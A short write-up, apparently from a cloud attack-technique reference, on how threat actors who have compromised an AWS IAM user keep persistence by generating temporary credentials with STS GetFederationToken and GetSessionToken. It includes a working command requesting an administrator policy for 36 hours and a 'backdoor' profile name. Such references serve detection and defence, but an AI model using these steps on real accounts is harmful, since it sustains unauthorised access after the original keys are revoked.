Generating Temporary AWS Credentials from IAM User

Overview

This is an interesting access vector that threat actors are taking to avoid detection and maintain persistence. By generating temporary credentials (this can be done multiple times to have backups) threat actors can maintain persistence in a target's AWS account.

• The temporary credentials remain active even if the original compromised IAM User has had their access keys deactivated / deleted

• The temporary credentials have whatever permissions the compromised IAM User has at the current time so adding or removing permissions affects the temporary credentials' permissions

• These options do not work with IAM Roles

sts:GetFederationToken

The following command allows you to generate temporary (15 min - 36 hours) credentials from an IAM User.

• You can specify any name you want — it doesn't need to be a real user

• You can specify any policy you want (up to 10 managed and/or inline policies) but you only have the permissions the user running this command has even if you pass it an administrator policy

aws sts get-federation-token --name sally --policy-arns arn=arn:aws:iam::aws:policy/AdministratorAccess --duration-seconds 129600

{
    "Credentials": {
        "AccessKeyId": "ASIA[REDACTED]",
        "SecretAccessKey": "pZlpr[REDACTED]",
        "SessionToken": "IQoJb3J[REDACTED]",
        "Expiration": "2025-11-11T08:56:15+00:00"
    },
    "FederatedUser": {
        "FederatedUserId": "111111111111:sally",
        "Arn": "arn:aws:sts::111111111111:federated-user/sally"
    },
    "PackedPolicySize": 7
}

• The credentials can be configured with aws --profile sally configure

sts:GetSessionToken

The following command allows you to generate temporary (15 min - 36 hours) credentials from an IAM User.

• The credentials can be configured with aws --profile tyler-backdoor configure